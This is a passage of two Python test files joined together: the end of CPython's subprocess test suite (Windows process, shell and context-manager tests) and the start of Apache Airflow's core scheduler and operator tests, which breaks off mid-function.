self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
core.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import io
import json
import multiprocessing
import os
import pickle # type: ignore
import re
import signal
import subprocess
import tempfile
import unittest
from datetime import timedelta
from tempfile import NamedTemporaryFile
from time import sleep
from unittest import mock
import sqlalchemy
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from pendulum import utcnow
from airflow import DAG, configuration, exceptions, jobs, settings, utils
from airflow.bin import cli
from airflow.configuration import AirflowConfigException, conf, run_command
from airflow.exceptions import AirflowException
from airflow.executors import SequentialExecutor
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.models import BaseOperator, Connection, DagBag, DagRun, Pool, TaskFail, TaskInstance, Variable
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from airflow.version import version
from tests.test_utils.config import conf_vars
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, context):
pass
class TestCore(unittest.TestCase):
TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_no_previous_runs'
TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous'
TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only'
TEST_SCHEDULE_ONCE_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_once'
TEST_SCHEDULE_RELATIVEDELTA_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_relativedelta'
TEST_SCHEDULE_START_END_DATES_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_start_end_dates'
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is not None:
return
dag_ids_to_clean = [
TEST_DAG_ID,
self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID,
self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
self.TEST_SCHEDULE_ONCE_DAG_ID,
self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
]
session = Session()
session.query(DagRun).filter(
DagRun.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
schedule_interval=delta)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(self.TEST_SCHEDULE_ONCE_DAG_ID)
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
start_date=start_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
msg = 'Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'
with conf_vars({('operators', 'allow_illegal_arguments'): 'True'}):
with self.assertWarns(PendingDeprecationWarning) as warning:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
assert any(msg in str(w) for w in warning.warnings)
def test_illegal_args_forbidden(self):
"""
Tests that operators raise exceptions on illegal arguments when
illegal arguments are not allowed.
"""
with self.assertRaises(AirflowException) as ctx:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
str(ctx.exception))
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
